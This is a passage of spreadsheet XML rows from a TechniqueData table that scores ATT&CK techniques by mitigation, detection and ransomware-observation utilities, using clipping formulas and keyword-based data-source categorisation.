      <c r="B284" s="37">
        <f t="shared" si="4"/>
        <v>264.28354361904763</v>
      </c>
      <c r="C284" s="37" t="s">
        <v>999</v>
      </c>
      <c r="D284" s="50" t="s">
        <v>1000</v>
      </c>
      <c r="E284" s="37"/>
      <c r="F284" s="37">
        <v>1</v>
      </c>
      <c r="G284" s="37">
        <v>1</v>
      </c>
      <c r="H284" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I284" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J284" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K284" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L284" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M284" s="37">
        <v>2.1471000000000001E-2</v>
      </c>
      <c r="N284" s="56">
        <v>0</v>
      </c>
      <c r="O284" s="56">
        <v>3</v>
      </c>
      <c r="P284" s="56">
        <v>3</v>
      </c>
      <c r="Q284" s="56">
        <v>2</v>
      </c>
      <c r="R284" s="57" t="s">
        <v>443</v>
      </c>
      <c r="S284" s="57">
        <v>2</v>
      </c>
      <c r="T284" s="57" t="s">
        <v>943</v>
      </c>
      <c r="U284" s="57">
        <v>6</v>
      </c>
      <c r="V284" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428595238095238</v>
      </c>
      <c r="W284" s="37">
        <v>8</v>
      </c>
      <c r="X284" s="37">
        <v>0.145455</v>
      </c>
      <c r="Y284" s="37">
        <v>0.145455</v>
      </c>
      <c r="Z284" s="37">
        <v>8</v>
      </c>
      <c r="AA284" s="37">
        <v>0.08</v>
      </c>
      <c r="AB284" s="37">
        <v>0.08</v>
      </c>
      <c r="AC284" s="37"/>
      <c r="AD284" s="50" t="s">
        <v>1001</v>
      </c>
      <c r="AE284" s="37" t="str" cm="1">
        <f t="array" ref="AE284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD284)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF284" s="37">
        <v>280</v>
      </c>
      <c r="AG284" s="37" t="str" cm="1">
        <f t="array" ref="AG284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH284" s="37">
        <v>280</v>
      </c>
      <c r="AI284" s="37" t="str" cm="1">
        <f t="array" ref="AI284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ284" s="37">
        <v>280</v>
      </c>
      <c r="AK284" s="37" t="str" cm="1">
        <f t="array" ref="AK284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL284" s="37">
        <v>280</v>
      </c>
      <c r="AM284" s="37" t="str" cm="1">
        <f t="array" ref="AM284">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD284)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN284" s="37">
        <v>0</v>
      </c>
      <c r="AO284" s="37">
        <v>1</v>
      </c>
      <c r="AP284" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ284" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>88.09451453968255</v>
      </c>
      <c r="AR284" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS284" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT284" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU28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2.1212979652305366</v>
      </c>
    </row>
    <row r="285" spans="1:47" ht="51">
      <c r="A285" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B285" s="37">
        <f t="shared" si="4"/>
        <v>385.71401785714289</v>
      </c>
      <c r="C285" s="37" t="s">
        <v>1002</v>
      </c>
      <c r="D285" s="50" t="s">
        <v>1003</v>
      </c>
      <c r="E285" s="37"/>
      <c r="F285" s="37">
        <v>1</v>
      </c>
      <c r="G285" s="37">
        <v>1</v>
      </c>
      <c r="H285" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I285" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J285" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K285" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L285" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M285" s="37">
        <v>0</v>
      </c>
      <c r="N285" s="56">
        <v>0</v>
      </c>
      <c r="O285" s="56">
        <v>1</v>
      </c>
      <c r="P285" s="56">
        <v>0</v>
      </c>
      <c r="Q285" s="56">
        <v>0</v>
      </c>
      <c r="R285" s="57" t="s">
        <v>1004</v>
      </c>
      <c r="S285" s="57">
        <v>11</v>
      </c>
      <c r="T285" s="57" t="s">
        <v>1005</v>
      </c>
      <c r="U285" s="57">
        <v>14</v>
      </c>
      <c r="V285" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24285690476190477</v>
      </c>
      <c r="W285" s="37">
        <v>25</v>
      </c>
      <c r="X285" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y285" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z285" s="37">
        <v>1</v>
      </c>
      <c r="AA285" s="37">
        <v>0.01</v>
      </c>
      <c r="AB285" s="37">
        <v>0.01</v>
      </c>
      <c r="AC285" s="37"/>
      <c r="AD285" s="50" t="s">
        <v>1006</v>
      </c>
      <c r="AE285" s="37" t="str" cm="1">
        <f t="array" ref="AE285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD285)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF285" s="37">
        <v>281</v>
      </c>
      <c r="AG285" s="37" t="str" cm="1">
        <f t="array" ref="AG285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD285)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH285" s="37">
        <v>281</v>
      </c>
      <c r="AI285" s="37" t="str" cm="1">
        <f t="array" ref="AI285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD285)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ285" s="37">
        <v>281</v>
      </c>
      <c r="AK285" s="37" t="str" cm="1">
        <f t="array" ref="AK285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD285)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL285" s="37">
        <v>281</v>
      </c>
      <c r="AM285" s="37" t="str" cm="1">
        <f t="array" ref="AM285">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD285)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN285" s="37">
        <v>0</v>
      </c>
      <c r="AO285" s="37">
        <v>0</v>
      </c>
      <c r="AP285" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ285" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>128.57133928571429</v>
      </c>
      <c r="AR285" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS285" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT285" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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86" spans="1:47" ht="51">
      <c r="A286" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B286" s="37">
        <f t="shared" si="4"/>
        <v>681.18236504761899</v>
      </c>
      <c r="C286" s="37" t="s">
        <v>1007</v>
      </c>
      <c r="D286" s="50" t="s">
        <v>1008</v>
      </c>
      <c r="E286" s="37"/>
      <c r="F286" s="37">
        <v>2</v>
      </c>
      <c r="G286" s="37">
        <v>5</v>
      </c>
      <c r="H286" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I286" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J286" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K286" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L286" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M286" s="37">
        <v>9.6900000000000003E-4</v>
      </c>
      <c r="N286" s="56">
        <v>0</v>
      </c>
      <c r="O286" s="56">
        <v>0</v>
      </c>
      <c r="P286" s="56">
        <v>4</v>
      </c>
      <c r="Q286" s="56">
        <v>11</v>
      </c>
      <c r="R286" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S286" s="57">
        <v>8</v>
      </c>
      <c r="T286" s="57" t="s">
        <v>1009</v>
      </c>
      <c r="U286" s="57">
        <v>11</v>
      </c>
      <c r="V286" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238119047619045</v>
      </c>
      <c r="W286" s="37">
        <v>19</v>
      </c>
      <c r="X286" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y286" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z286" s="37">
        <v>15</v>
      </c>
      <c r="AA286" s="37">
        <v>0.15</v>
      </c>
      <c r="AB286" s="37">
        <v>0.15</v>
      </c>
      <c r="AC286" s="37"/>
      <c r="AD286" s="50" t="s">
        <v>1010</v>
      </c>
      <c r="AE286" s="37" t="str" cm="1">
        <f t="array" ref="AE286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD286)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF286" s="37">
        <v>282</v>
      </c>
      <c r="AG286" s="37" t="str" cm="1">
        <f t="array" ref="AG286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH286" s="37">
        <v>282</v>
      </c>
      <c r="AI286" s="37" t="str" cm="1">
        <f t="array" ref="AI286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD286)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ286" s="37">
        <v>282</v>
      </c>
      <c r="AK286" s="37" t="str" cm="1">
        <f t="array" ref="AK286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL286" s="37">
        <v>282</v>
      </c>
      <c r="AM286" s="37" t="str" cm="1">
        <f t="array" ref="AM286">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD286)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN286" s="37">
        <v>0</v>
      </c>
      <c r="AO286" s="37">
        <v>2</v>
      </c>
      <c r="AP286" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ286" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>227.06078834920632</v>
      </c>
      <c r="AR286" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS286" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT286" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU28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10.860037540438396</v>
      </c>
    </row>
    <row r="287" spans="1:47" ht="51">
      <c r="A287" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B287" s="37">
        <f t="shared" si="4"/>
        <v>356.08598404761904</v>
      </c>
      <c r="C287" s="37" t="s">
        <v>1011</v>
      </c>
      <c r="D287" s="50" t="s">
        <v>1008</v>
      </c>
      <c r="E287" s="37" t="s">
        <v>1012</v>
      </c>
      <c r="F287" s="37">
        <v>1</v>
      </c>
      <c r="G287" s="37">
        <v>1</v>
      </c>
      <c r="H287" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I287" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J287" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K287" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L287" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M287" s="37">
        <v>0</v>
      </c>
      <c r="N287" s="56">
        <v>1</v>
      </c>
      <c r="O287" s="56">
        <v>4</v>
      </c>
      <c r="P287" s="56">
        <v>0</v>
      </c>
      <c r="Q287" s="56">
        <v>2</v>
      </c>
      <c r="R287" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S287" s="57">
        <v>8</v>
      </c>
      <c r="T287" s="57" t="s">
        <v>1009</v>
      </c>
      <c r="U287" s="57">
        <v>11</v>
      </c>
      <c r="V287" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428595238095238</v>
      </c>
      <c r="W287" s="37">
        <v>19</v>
      </c>
      <c r="X287" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y287" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z287" s="37">
        <v>7</v>
      </c>
      <c r="AA287" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB287" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC287" s="37"/>
      <c r="AD287" s="50" t="s">
        <v>1010</v>
      </c>
      <c r="AE287" s="37" t="str" cm="1">
        <f t="array" ref="AE287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD287)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF287" s="37">
        <v>283</v>
      </c>
      <c r="AG287" s="37" t="str" cm="1">
        <f t="array" ref="AG287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH287" s="37">
        <v>283</v>
      </c>
      <c r="AI287" s="37" t="str" cm="1">
        <f t="array" ref="AI287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD287)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ287" s="37">
        <v>283</v>
      </c>
      <c r="AK287" s="37" t="str" cm="1">
        <f t="array" ref="AK287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL287" s="37">
        <v>283</v>
      </c>
      <c r="AM287" s="37" t="str" cm="1">
        <f t="array" ref="AM287">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD287)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN287" s="37">
        <v>0</v>
      </c>
      <c r="AO287" s="37">
        <v>0</v>
      </c>
      <c r="AP287" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ287" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>118.69532801587302</v>
      </c>
      <c r="AR287" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS287" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT287" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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88" spans="1:47" ht="34">
      <c r="A288" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B288" s="37">
        <f t="shared" si="4"/>
        <v>357.34312785714286</v>
      </c>
      <c r="C288" s="37" t="s">
        <v>1013</v>
      </c>
      <c r="D288" s="50" t="s">
        <v>1008</v>
      </c>
      <c r="E288" s="37" t="s">
        <v>1014</v>
      </c>
      <c r="F288" s="37">
        <v>1</v>
      </c>
      <c r="G288" s="37">
        <v>1</v>
      </c>
      <c r="H288" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I288" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J288" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K288" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L288" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M288" s="37">
        <v>0</v>
      </c>
      <c r="N288" s="56">
        <v>1</v>
      </c>
      <c r="O288" s="56">
        <v>4</v>
      </c>
      <c r="P288" s="56">
        <v>1</v>
      </c>
      <c r="Q288" s="56">
        <v>1</v>
      </c>
      <c r="R288" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S288" s="57">
        <v>8</v>
      </c>
      <c r="T288" s="57" t="s">
        <v>1009</v>
      </c>
      <c r="U288" s="57">
        <v>11</v>
      </c>
      <c r="V288" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428595238095238</v>
      </c>
      <c r="W288" s="37">
        <v>19</v>
      </c>
      <c r="X288" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y288" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z288" s="37">
        <v>7</v>
      </c>
      <c r="AA288" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB288" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC288" s="37"/>
      <c r="AD288" s="50" t="s">
        <v>1015</v>
      </c>
      <c r="AE288" s="37" t="str" cm="1">
        <f t="array" ref="AE288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD288)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF288" s="37">
        <v>284</v>
      </c>
      <c r="AG288" s="37" t="str" cm="1">
        <f t="array" ref="AG288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH288" s="37">
        <v>284</v>
      </c>
      <c r="AI288" s="37" t="str" cm="1">
        <f t="array" ref="AI288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD288)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ288" s="37">
        <v>284</v>
      </c>
      <c r="AK288" s="37" t="str" cm="1">
        <f t="array" ref="AK288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL288" s="37">
        <v>284</v>
      </c>
      <c r="AM288" s="37" t="str" cm="1">
        <f t="array" ref="AM288">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD288)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN288" s="37">
        <v>0</v>
      </c>
      <c r="AO288" s="37">
        <v>0</v>
      </c>
      <c r="AP288" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ288" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>119.11437595238095</v>
      </c>
      <c r="AR288" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS288" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT288" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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89" spans="1:47" ht="34">
      <c r="A289" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B289" s="37">
        <f t="shared" si="4"/>
        <v>114.10000000000001</v>
      </c>
      <c r="C289" s="37" t="s">
        <v>1016</v>
      </c>
      <c r="D289" s="50" t="s">
        <v>1017</v>
      </c>
      <c r="E289" s="37"/>
      <c r="F289" s="37">
        <v>1</v>
      </c>
      <c r="G289" s="37">
        <v>1</v>
      </c>
      <c r="H289" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I289" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J289" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K289" s="37">
